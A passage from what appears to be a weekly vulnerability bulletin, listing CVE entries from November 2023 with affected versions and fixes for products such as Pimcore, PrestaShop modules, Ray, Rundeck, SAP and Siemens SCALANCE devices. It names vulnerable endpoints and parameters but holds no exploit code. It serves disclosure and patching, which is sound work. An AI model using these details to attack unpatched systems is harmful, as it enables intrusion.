phoenix — securecore(tm)_technology(tm) Improper Access Control in SMI handler vulnerability in Phoenix SecureCore™ Technology™ 4 allows SPI flash modification. This issue affects SecureCore™ Technology™ 4: * from 4.3.0.0 before 4.3.0.203 * from 4.3.1.0 before 4.3.1.163 * from 4.4.0.0 before 4.4.0.217 * from 4.5.0.0 before 4.5.0.138 2023-11-15 not yet calculated CVE-2023-31100
piccolo — piccolo Piccolo is an object-relational mapping and query builder which supports asyncio. Prior to version 1.1.1, the handling of named transaction `savepoints` in all database implementations is vulnerable to SQL Injection via f-strings. While the likelihood of an end developer exposing a `savepoints` `name` parameter to a user is highly unlikely, it would not be unheard of. If a malicious user was able to abuse this functionality they would have essentially direct access to the database and the ability to modify data to the level of permissions associated with the database user. A non exhaustive list of actions possible based on database permissions is: Read all data stored in the database, including usernames and password hashes; insert arbitrary data into the database, including modifying existing records; and gain a shell on the underlying server. Version 1.1.1 fixes this issue. 2023-11-10 not yet calculated CVE-2023-47128
 
pimcore — pimcore
 
The Pimcore Admin Classic Bundle provides a Backend UI for Pimcore. Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. In the case of pimcore, the fopen() function here doesn’t have an error handle when the file doesn’t exist on the server, so the server response raises the full path “fopen(/var/www/html/var/tmp/export-{ uniqe id}.csv)”. This issue has been patched in commit `10d178ef771` which has been included in release version 1.2.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-15 not yet calculated CVE-2023-47636

 

pimcore — pimcore
 
Pimcore is an Open Source Data & Experience Management Platform. In affected versions the `/admin/object/grid-proxy` endpoint calls `getFilterCondition()` on fields of classes to be filtered for, passing input from the request, and later executes the returned SQL. One implementation of `getFilterCondition()` is in `Multiselect`, which does not normalize/escape/validate the passed value. Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level. This vulnerability has been addressed in version 11.1.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-15 not yet calculated CVE-2023-47637

 

pre-school_enrollment — pre-school_enrollment Pre-School Enrollment version 1.0 is vulnerable to Cross Site Scripting (XSS) on the profile.php page via fullname parameter. 2023-11-15 not yet calculated CVE-2023-47446
pre-school_enrollment — pre-school_enrollment
 
Pre-School Enrollment version 1.0 is vulnerable to SQL Injection via the username parameter in preschool/admin/ page. 2023-11-15 not yet calculated CVE-2023-47445
prefecthq — prefecthq/prefect
 
An attacker is able to steal secrets and potentially gain remote code execution via CSRF using the Prefect API. 2023-11-16 not yet calculated CVE-2023-6022
prestashop — prestashop
 
MyPrestaModules ordersexport before v5.0 was discovered to contain multiple SQL injection vulnerabilities at send.php via the key and save_setting parameters. 2023-11-15 not yet calculated CVE-2023-40923
prestashop — prestashop
 
In the module “SoNice Retour” (sonice_retour) up to version 2.1.0 from Common-Services for PrestaShop, a guest can download personal information without restriction by performing a path traversal attack. Due to a lack of permissions control and a lack of control in the path name construction, a guest can perform a path traversal to view all files on the information system. 2023-11-17 not yet calculated CVE-2023-45382
 
prestashop — prestashop
 
In the module “Product Catalog (CSV, Excel, XML) Export PRO” (exportproducts) in versions up to 5.0.0 from MyPrestaModules for PrestaShop, a guest can perform SQL injection via `exportProduct::_addDataToDb().` 2023-11-17 not yet calculated CVE-2023-45387
 
prestashop — prestashop
 
In the module “Newsletter Popup PRO with Voucher/Coupon code” (newsletterpop) before version 2.6.1 from Active Design for PrestaShop, a guest can perform SQL injection in affected versions. The method `NewsletterpopsendVerificationModuleFrontController::checkEmailSubscription()` has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection. 2023-11-15 not yet calculated CVE-2023-47308
prestashop — prestashop
 
Nukium nkmgls before version 3.0.2 is vulnerable to Cross Site Scripting (XSS) via NkmGlsCheckoutModuleFrontController::displayAjaxSavePhoneMobile. 2023-11-15 not yet calculated CVE-2023-47309
publiccms — publiccms
 
An issue in PublicCMS v.4.0.202302.e allows a remote attacker to obtain sensitive information via the appToken and Parameters parameter of the api/method/getHtml component. 2023-11-16 not yet calculated CVE-2023-48204
px4 — px4-autopilot
 
PX4 autopilot is a flight control solution for drones. In affected versions a global buffer overflow vulnerability exists in the CrsfParser_TryParseCrsfPacket function in /src/drivers/rc/crsf_rc/CrsfParser.cpp:298 due to the invalid size check. A malicious user may create an RC packet remotely and that packet goes into the device where the _rcs_buf reads. The global buffer overflow vulnerability will be triggered and the drone can behave unexpectedly. This issue has been addressed in version 1.14.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-13 not yet calculated CVE-2023-47625
 
pypinksign — pypinksign
 
PyPinkSign v0.5.1 uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption. This vulnerability can lead to the disclosure of information and communications. 2023-11-16 not yet calculated CVE-2023-48056

 

qlikteck_international_ab — qlik_sense_enterprise_for_windows
 
Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthenticated remote code execution, aka QB-21683. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application. The fixed versions are August 2023 Patch 2, May 2023 Patch 6, February 2023 Patch 10, November 2022 Patch 12, August 2022 Patch 14, May 2022 Patch 16, February 2022 Patch 15, and November 2021 Patch 17. NOTE: this issue exists because of an incomplete fix for CVE-2023-41265. 2023-11-15 not yet calculated CVE-2023-48365
qnap — multiple_products An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2376 build 20230421 and later QuTS hero h5.0.1.2376 build 20230421 and later QuTScloud c5.1.0.2498 and later 2023-11-10 not yet calculated CVE-2023-23367
quarkus — quarkus
 
A flaw was found in Quarkus, where it does not properly sanitize artifacts created using the Gradle plugin, allowing certain build system information to remain. This flaw allows an attacker to access potentially sensitive information from the build system within the application. 2023-11-15 not yet calculated CVE-2023-5720
 
ray — ray
 
A command injection exists in Ray’s cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. 2023-11-16 not yet calculated CVE-2023-6019
ray — ray
 
LFI in Ray’s /static/ directory allows attackers to read any file on the server without authentication. 2023-11-16 not yet calculated CVE-2023-6020
ray — ray
 
LFI in Ray’s log API endpoint allows attackers to read any file on the server without authentication. 2023-11-16 not yet calculated CVE-2023-6021
reactor_netty — http_server In Reactor Netty HTTP Server, versions 1.1.x prior to 1.1.13 and versions 1.0.x prior to 1.0.39, a malicious user can send a request using a specially crafted URL that can lead to a directory traversal attack. Specifically, an application is vulnerable if Reactor Netty HTTP Server is configured to serve static resources. 2023-11-15 not yet calculated CVE-2023-34062
redis– redisgraph An issue in RedisGraph v.2.12.10 allows an attacker to execute arbitrary code and cause a denial of service via a crafted string in DataBlock_ItemIsDeleted. 2023-11-16 not yet calculated CVE-2023-47003
rundeck — rundeck
 
Rundeck is an open source automation service with a web console, command line tools and a WebAPI. In affected versions access to two URLs used in both Rundeck Open Source and Process Automation products could allow authenticated users to access the URL path, which would allow access to view or delete jobs, without the necessary authorization checks. This issue has been addressed in version 4.17.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-16 not yet calculated CVE-2023-48222
rundeck — rundeck Rundeck is an open source automation service with a web console, command line tools and a WebAPI. In affected versions access to two URLs used in both Rundeck Open Source and Process Automation products could allow authenticated users to access the URL path, which provides a list of job names and groups for any project, without the necessary authorization checks. The output of these endpoints only exposes the name of job groups and the jobs contained within the specified project. The output is read-only and the access does not allow changes to the information. This vulnerability has been patched in version 4.17.3. Users are advised to upgrade. Users unable to upgrade may block access to the two URLs used in either Rundeck Open Source or Process Automation products at a load balancer level. 2023-11-16 not yet calculated CVE-2023-47112
sandisk — sandisk_security_installer_for_windows
 
Multiple DLL Search Order Hijack vulnerabilities were addressed in the SanDisk Security Installer for Windows that could allow attackers with local access to execute arbitrary code by executing the installer in the same folder as the malicious DLL. This can lead to the execution of arbitrary code with the privileges of the vulnerable application or obtain a certain level of persistence on the compromised host.  2023-11-15 not yet calculated CVE-2023-22818
sap — business_one_installation SAP Business One installation – version 10.0, does not perform proper authentication and authorization checks for SMB shared folder. As a result, any malicious user can read and write to the SMB shared folder. Additionally, the files in the folder can be executed or be used by the installation process leading to considerable impact on confidentiality, integrity and availability. 2023-11-14 not yet calculated CVE-2023-31403
 
sap — netweaver_application_server Under certain condition SAP NetWeaver Application Server ABAP – versions KERNEL 722, KERNEL 7.53, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.54, KERNEL 7.91, KERNEL 7.92, KERNEL 7.93, KERNEL 7.94, KERNEL64UC 7.22, KERNEL64UC 7.22EXT, KERNEL64UC 7.53, KERNEL64NUC 7.22, KERNEL64NUC 7.22EXT, allows an unauthenticated attacker to access the unintended data due to the lack of restrictions applied which may lead to low impact in confidentiality and no impact on the integrity and availability of the application. 2023-11-14 not yet calculated CVE-2023-41366
 
sap — netweaver_as_java_logon_application The unauthenticated attacker in NetWeaver AS Java Logon application – version 7.50, can brute force the login functionality to identify the legitimate user ids. This will have an impact on confidentiality but there is no other impact on integrity or availability. 2023-11-14 not yet calculated CVE-2023-42480
 
schneider_electric — ecostruxure_power_monitoring_expert
 
A CWE-601 URL Redirection to Untrusted Site vulnerability exists that could cause an open redirect vulnerability leading to a cross site scripting attack. By providing a URL-encoded input attackers can cause the software’s web application to redirect to the chosen domain after a successful login is performed. 2023-11-15 not yet calculated CVE-2023-5986
schneider_electric — ecostruxure_power_monitoring_expert
 
A CWE-79 Improper Neutralization of Input During Web Page Generation (Cross-site Scripting) vulnerability that could cause a vulnerability leading to a cross site scripting condition where attackers can have a victim’s browser run arbitrary JavaScript when they visit a page containing the injected payload. 2023-11-15 not yet calculated CVE-2023-5987
schneider_electric — galaxy_vs
 
A CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability exists that could cause a file system enumeration and file download when an attacker navigates to the Network Management Card via HTTPS. 2023-11-15 not yet calculated CVE-2023-6032
schneider_electric — ion8650
 
A CWE-494 Download of Code Without Integrity Check vulnerability exists that could allow modified firmware to be uploaded when an authorized admin user begins a firmware update procedure. 2023-11-15 not yet calculated CVE-2023-5984
schneider_electric — ion8650
 
A CWE-79 Improper Neutralization of Input During Web Page Generation vulnerability exists that could cause compromise of a user’s browser when an attacker with admin privileges has modified system values. 2023-11-15 not yet calculated CVE-2023-5985
siemens — comos A vulnerability has been identified in COMOS (All versions). The affected application lacks proper access controls in making the SQLServer connection. This could allow an attacker to query the database directly to access information that the user should not have access to. 2023-11-14 not yet calculated CVE-2023-46601
siemens — multiple_products A vulnerability has been identified in SCALANCE XB205-3 (SC, PN) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, PN) (All versions < V4.5), SCALANCE XB205-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB205-3LD (SC, PN) (All versions < V4.5), SCALANCE XB208 (E/IP) (All versions < V4.5), SCALANCE XB208 (PN) (All versions < V4.5), SCALANCE XB213-3 (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3 (SC, PN) (All versions < V4.5), SCALANCE XB213-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB213-3 (ST, PN) (All versions < V4.5), SCALANCE XB213-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3LD (SC, PN) (All versions < V4.5), SCALANCE XB216 (E/IP) (All versions < V4.5), SCALANCE XB216 (PN) (All versions < V4.5), SCALANCE XC206-2 (SC) (All versions < V4.5), SCALANCE XC206-2 (ST/BFOC) (All versions < V4.5), SCALANCE XC206-2G PoE (All versions < V4.5), SCALANCE XC206-2G PoE (54 V DC) (All versions < V4.5), SCALANCE XC206-2G PoE EEC (54 V DC) (All versions < V4.5), SCALANCE XC206-2SFP (All versions < V4.5), SCALANCE XC206-2SFP EEC (All versions < V4.5), SCALANCE XC206-2SFP G (All versions < V4.5), SCALANCE XC206-2SFP G (EIP DEF.) (All versions < V4.5), SCALANCE XC206-2SFP G EEC (All versions < V4.5), SCALANCE XC208 (All versions < V4.5), SCALANCE XC208EEC (All versions < V4.5), SCALANCE XC208G (All versions < V4.5), SCALANCE XC208G (EIP def.) (All versions < V4.5), SCALANCE XC208G EEC (All versions < V4.5), SCALANCE XC208G PoE (All versions < V4.5), SCALANCE XC208G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216 (All versions < V4.5), SCALANCE XC216-3G PoE (All versions < V4.5), SCALANCE XC216-3G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216-4C (All versions < V4.5), SCALANCE XC216-4C G (All versions < V4.5), SCALANCE XC216-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC216-4C G EEC (All versions < V4.5), SCALANCE XC216EEC (All versions < V4.5), SCALANCE XC224 (All versions < V4.5), SCALANCE XC224-4C G (All versions < V4.5), SCALANCE XC224-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC224-4C G EEC (All versions < V4.5), SCALANCE XF204 (All versions < V4.5), SCALANCE XF204 DNA (All versions < V4.5), SCALANCE XF204-2BA (All versions < V4.5), SCALANCE XF204-2BA DNA (All versions < V4.5), SCALANCE XP208 (All versions < V4.5), SCALANCE XP208 (Ethernet/IP) (All versions < V4.5), SCALANCE XP208EEC (All versions < V4.5), SCALANCE XP208PoE EEC (All versions < V4.5), SCALANCE XP216 (All versions < V4.5), SCALANCE XP216 (Ethernet/IP) (All versions < V4.5), SCALANCE XP216EEC (All versions < V4.5), SCALANCE XP216POE EEC (All versions < V4.5), SCALANCE XR324WG (24 x FE, AC 230V) (All versions < V4.5), SCALANCE XR324WG (24 X FE, DC 24V) (All versions < V4.5), SCALANCE XR326-2C PoE WG (All versions < V4.5), SCALANCE XR326-2C PoE WG (without UL) (All versions < V4.5), SCALANCE XR328-4C WG (24XFE, 4XGE, 24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE, 4xGE,DC24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, AC 230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, DC 24V) (All versions < V4.5), SIPLUS NET SCALANCE XC206-2 (All versions < V4.5), SIPLUS NET SCALANCE XC206-2SFP (All versions < V4.5), SIPLUS NET SCALANCE XC208 (All versions < V4.5), SIPLUS NET SCALANCE XC216-4C (All versions < V4.5). Affected products do not properly validate the content of uploaded X509 certificates which could allow an attacker with administrative privileges to execute arbitrary code on the device. 2023-11-14 not yet calculated CVE-2023-44317
siemens — multiple_products A vulnerability has been identified in SCALANCE XB205-3 (SC, PN) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, PN) (All versions < V4.5), SCALANCE XB205-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB205-3LD (SC, PN) (All versions < V4.5), SCALANCE XB208 (E/IP) (All versions < V4.5), SCALANCE XB208 (PN) (All versions < V4.5), SCALANCE XB213-3 (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3 (SC, PN) (All versions < V4.5), SCALANCE XB213-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB213-3 (ST, PN) (All versions < V4.5), SCALANCE XB213-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3LD (SC, PN) (All versions < V4.5), SCALANCE XB216 (E/IP) (All versions < V4.5), SCALANCE XB216 (PN) (All versions < V4.5), SCALANCE XC206-2 (SC) (All versions < V4.5), SCALANCE XC206-2 (ST/BFOC) (All versions < V4.5), SCALANCE XC206-2G PoE (All versions < V4.5), SCALANCE XC206-2G PoE (54 V DC) (All versions < V4.5), SCALANCE XC206-2G PoE EEC (54 V DC) (All versions < V4.5), SCALANCE XC206-2SFP (All versions < V4.5), SCALANCE XC206-2SFP EEC (All versions < V4.5), SCALANCE XC206-2SFP G (All versions < V4.5), SCALANCE XC206-2SFP G (EIP DEF.) (All versions < V4.5), SCALANCE XC206-2SFP G EEC (All versions < V4.5), SCALANCE XC208 (All versions < V4.5), SCALANCE XC208EEC (All versions < V4.5), SCALANCE XC208G (All versions < V4.5), SCALANCE XC208G (EIP def.) (All versions < V4.5), SCALANCE XC208G EEC (All versions < V4.5), SCALANCE XC208G PoE (All versions < V4.5), SCALANCE XC208G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216 (All versions < V4.5), SCALANCE XC216-3G PoE (All versions < V4.5), SCALANCE XC216-3G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216-4C (All versions < V4.5), SCALANCE XC216-4C G (All versions < V4.5), SCALANCE XC216-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC216-4C G EEC (All versions < V4.5), SCALANCE XC216EEC (All versions < V4.5), SCALANCE XC224 (All versions < V4.5), SCALANCE XC224-4C G (All versions < V4.5), SCALANCE XC224-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC224-4C G EEC (All versions < V4.5), SCALANCE XF204 (All versions < V4.5), SCALANCE XF204 DNA (All versions < V4.5), SCALANCE XF204-2BA (All versions < V4.5), SCALANCE XF204-2BA DNA (All versions < V4.5), SCALANCE XP208 (All versions < V4.5), SCALANCE XP208 (Ethernet/IP) (All versions < V4.5), SCALANCE XP208EEC (All versions < V4.5), SCALANCE XP208PoE EEC (All versions < V4.5), SCALANCE XP216 (All versions < V4.5), SCALANCE XP216 (Ethernet/IP) (All versions < V4.5), SCALANCE XP216EEC (All versions < V4.5), SCALANCE XP216POE EEC (All versions < V4.5), SCALANCE XR324WG (24 x FE, AC 230V) (All versions < V4.5), SCALANCE XR324WG (24 X FE, DC 24V) (All versions < V4.5), SCALANCE XR326-2C PoE WG (All versions < V4.5), SCALANCE XR326-2C PoE WG (without UL) (All versions < V4.5), SCALANCE XR328-4C WG (24XFE, 4XGE, 24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE, 4xGE,DC24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, AC 230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, DC 24V) (All versions < V4.5), SIPLUS NET SCALANCE XC206-2 (All versions < V4.5), SIPLUS NET SCALANCE XC206-2SFP (All versions < V4.5), SIPLUS NET SCALANCE XC208 (All versions < V4.5), SIPLUS NET SCALANCE XC216-4C (All versions < V4.5). Affected devices use a weak checksum algorithm to protect the configuration backup that an administrator can export from the device. This could allow an authenticated attacker with administrative privileges or an attacker that tricks a legitimate administrator to upload a modified configuration file to change the configuration of an affected device. 2023-11-14 not yet calculated CVE-2023-44319
siemens — multiple_products A vulnerability has been identified in SCALANCE XB205-3 (SC, PN) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, PN) (All versions < V4.5), SCALANCE XB205-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB205-3LD (SC, PN) (All versions < V4.5), SCALANCE XB208 (E/IP) (All versions < V4.5), SCALANCE XB208 (PN) (All versions < V4.5), SCALANCE XB213-3 (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3 (SC, PN) (All versions < V4.5), SCALANCE XB213-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB213-3 (ST, PN) (All versions < V4.5), SCALANCE XB213-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3LD (SC, PN) (All versions < V4.5), SCALANCE XB216 (E/IP) (All versions < V4.5), SCALANCE XB216 (PN) (All versions < V4.5), SCALANCE XC206-2 (SC) (All versions < V4.5), SCALANCE XC206-2 (ST/BFOC) (All versions < V4.5), SCALANCE XC206-2G PoE (All versions < V4.5), SCALANCE XC206-2G PoE (54 V DC) (All versions < V4.5), SCALANCE XC206-2G PoE EEC (54 V DC) (All versions < V4.5), SCALANCE XC206-2SFP (All versions < V4.5), SCALANCE XC206-2SFP EEC (All versions < V4.5), SCALANCE XC206-2SFP G (All versions < V4.5), SCALANCE XC206-2SFP G (EIP DEF.) (All versions < V4.5), SCALANCE XC206-2SFP G EEC (All versions < V4.5), SCALANCE XC208 (All versions < V4.5), SCALANCE XC208EEC (All versions < V4.5), SCALANCE XC208G (All versions < V4.5), SCALANCE XC208G (EIP def.) (All versions < V4.5), SCALANCE XC208G EEC (All versions < V4.5), SCALANCE XC208G PoE (All versions < V4.5), SCALANCE XC208G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216 (All versions < V4.5), SCALANCE XC216-3G PoE (All versions < V4.5), SCALANCE XC216-3G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216-4C (All versions < V4.5), SCALANCE XC216-4C G (All versions < V4.5), SCALANCE XC216-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC216-4C G EEC (All versions < V4.5), SCALANCE XC216EEC (All versions < V4.5), SCALANCE XC224 (All versions < V4.5), SCALANCE XC224-4C G (All versions < V4.5), SCALANCE XC224-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC224-4C G EEC (All versions < V4.5), SCALANCE XF204 (All versions < V4.5), SCALANCE XF204 DNA (All versions < V4.5), SCALANCE XF204-2BA (All versions < V4.5), SCALANCE XF204-2BA DNA (All versions < V4.5), SCALANCE XP208 (All versions < V4.5), SCALANCE XP208 (Ethernet/IP) (All versions < V4.5), SCALANCE XP208EEC (All versions < V4.5), SCALANCE XP208PoE EEC (All versions < V4.5), SCALANCE XP216 (All versions < V4.5), SCALANCE XP216 (Ethernet/IP) (All versions < V4.5), SCALANCE XP216EEC (All versions < V4.5), SCALANCE XP216POE EEC (All versions < V4.5), SCALANCE XR324WG (24 x FE, AC 230V) (All versions < V4.5), SCALANCE XR324WG (24 X FE, DC 24V) (All versions < V4.5), SCALANCE XR326-2C PoE WG (All versions < V4.5), SCALANCE XR326-2C PoE WG (without UL) (All versions < V4.5), SCALANCE XR328-4C WG (24XFE, 4XGE, 24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE, 4xGE,DC24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, AC 230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, DC 24V) (All versions < V4.5), SIPLUS NET SCALANCE XC206-2 (All versions < V4.5), SIPLUS NET SCALANCE XC206-2SFP (All versions < V4.5), SIPLUS NET SCALANCE XC208 (All versions < V4.5), SIPLUS NET SCALANCE XC216-4C (All versions < V4.5). Affected devices do not properly validate the authentication when performing certain modifications in the web interface allowing an authenticated attacker to influence the user interface configured by an administrator. 2023-11-14 not yet calculated CVE-2023-44320
siemens — multiple_products A vulnerability has been identified in SCALANCE XB205-3 (SC, PN) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, PN) (All versions < V4.5), SCALANCE XB205-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB205-3LD (SC, PN) (All versions < V4.5), SCALANCE XB208 (E/IP) (All versions < V4.5), SCALANCE XB208 (PN) (All versions < V4.5), SCALANCE XB213-3 (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3 (SC, PN) (All versions < V4.5), SCALANCE XB213-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB213-3 (ST, PN) (All versions < V4.5), SCALANCE XB213-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3LD (SC, PN) (All versions < V4.5), SCALANCE XB216 (E/IP) (All versions < V4.5), SCALANCE XB216 (PN) (All versions < V4.5), SCALANCE XC206-2 (SC) (All versions < V4.5), SCALANCE XC206-2 (ST/BFOC) (All versions < V4.5), SCALANCE XC206-2G PoE (All versions < V4.5), SCALANCE XC206-2G PoE (54 V DC) (All versions < V4.5), SCALANCE XC206-2G PoE EEC (54 V DC) (All versions < V4.5), SCALANCE XC206-2SFP (All versions < V4.5), SCALANCE XC206-2SFP EEC (All versions < V4.5), SCALANCE XC206-2SFP G (All versions < V4.5), SCALANCE XC206-2SFP G (EIP DEF.) (All versions < V4.5), SCALANCE XC206-2SFP G EEC (All versions < V4.5), SCALANCE XC208 (All versions < V4.5), SCALANCE XC208EEC (All versions < V4.5), SCALANCE XC208G (All versions < V4.5), SCALANCE XC208G (EIP def.) (All versions < V4.5), SCALANCE XC208G EEC (All versions < V4.5), SCALANCE XC208G PoE (All versions < V4.5), SCALANCE XC208G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216 (All versions < V4.5), SCALANCE XC216-3G PoE (All versions < V4.5), SCALANCE XC216-3G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216-4C (All versions < V4.5), SCALANCE XC216-4C G (All versions < V4.5), SCALANCE XC216-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC216-4C G EEC (All versions < V4.5), SCALANCE XC216EEC (All versions < V4.5), SCALANCE XC224 (All versions < V4.5), SCALANCE XC224-4C G (All versions < V4.5), SCALANCE XC224-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC224-4C G EEC (All versions < V4.5), SCALANCE XF204 (All versions < V4.5), SCALANCE XF204 DNA (All versions < V4.5), SCALANCE XF204-2BA (All versions < V4.5), SCALANCE XF204-2BA DNA (All versions < V4.5), SCALANCE XP208 (All versions < V4.5), SCALANCE XP208 (Ethernet/IP) (All versions < V4.5), SCALANCE XP208EEC (All versions < V4.5), SCALANCE XP208PoE EEC (All versions < V4.5), SCALANCE XP216 (All versions < V4.5), SCALANCE XP216 (Ethernet/IP) (All versions < V4.5), SCALANCE XP216EEC (All versions < V4.5), SCALANCE XP216POE EEC (All versions < V4.5), SCALANCE XR324WG (24 x FE, AC 230V) (All versions < V4.5), SCALANCE XR324WG (24 X FE, DC 24V) (All versions < V4.5), SCALANCE XR326-2C PoE WG (All versions < V4.5), SCALANCE XR326-2C PoE WG (without UL) (All versions < V4.5), SCALANCE XR328-4C WG (24XFE, 4XGE, 24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE, 4xGE,DC24V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, AC 230V) (All versions < V4.5), SCALANCE XR328-4C WG (28xGE, DC 24V) (All versions < V4.5), SIPLUS NET SCALANCE XC206-2 (All versions < V4.5), SIPLUS NET SCALANCE XC206-2SFP (All versions < V4.5), SIPLUS NET SCALANCE XC208 (All versions < V4.5), SIPLUS NET SCALANCE XC216-4C (All versions < V4.5). Affected devices do not properly validate the length of inputs when performing certain configuration changes in the web interface allowing an authenticated attacker to cause a denial-of-service condition. The device needs to be restarted for the web interface to become available again. 2023-11-14 not yet calculated CVE-2023-44321
siemens — multiple_products A vulnerability has been identified in SCALANCE XB205-3 (SC, PN) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB205-3 (ST, PN) (All versions < V4.5), SCALANCE XB205-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB205-3LD (SC, PN) (All versions < V4.5), SCALANCE XB208 (E/IP) (All versions < V4.5), SCALANCE XB208 (PN) (All versions < V4.5), SCALANCE XB213-3 (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3 (SC, PN) (All versions < V4.5), SCALANCE XB213-3 (ST, E/IP) (All versions < V4.5), SCALANCE XB213-3 (ST, PN) (All versions < V4.5), SCALANCE XB213-3LD (SC, E/IP) (All versions < V4.5), SCALANCE XB213-3LD (SC, PN) (All versions < V4.5), SCALANCE XB216 (E/IP) (All versions < V4.5), SCALANCE XB216 (PN) (All versions < V4.5), SCALANCE XC206-2 (SC) (All versions < V4.5), SCALANCE XC206-2 (ST/BFOC) (All versions < V4.5), SCALANCE XC206-2G PoE (All versions < V4.5), SCALANCE XC206-2G PoE (54 V DC) (All versions < V4.5), SCALANCE XC206-2G PoE EEC (54 V DC) (All versions < V4.5), SCALANCE XC206-2SFP (All versions < V4.5), SCALANCE XC206-2SFP EEC (All versions < V4.5), SCALANCE XC206-2SFP G (All versions < V4.5), SCALANCE XC206-2SFP G (EIP DEF.) (All versions < V4.5), SCALANCE XC206-2SFP G EEC (All versions < V4.5), SCALANCE XC208 (All versions < V4.5), SCALANCE XC208EEC (All versions < V4.5), SCALANCE XC208G (All versions < V4.5), SCALANCE XC208G (EIP def.) (All versions < V4.5), SCALANCE XC208G EEC (All versions < V4.5), SCALANCE XC208G PoE (All versions < V4.5), SCALANCE XC208G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216 (All versions < V4.5), SCALANCE XC216-3G PoE (All versions < V4.5), SCALANCE XC216-3G PoE (54 V DC) (All versions < V4.5), SCALANCE XC216-4C (All versions < V4.5), SCALANCE XC216-4C G (All versions < V4.5), SCALANCE XC216-4C G (EIP Def.) (All versions < V4.5), SCALANCE XC216-4C G EEC (All versions < V4.5), SCALANCE XC216EEC (All versions < V4.5), SCALANCE XC224 (All versions < V4.5), SCALANCE XC224-4C G (All versions < V4.5), SCALANCE XC224-4C G (EIP Def.) 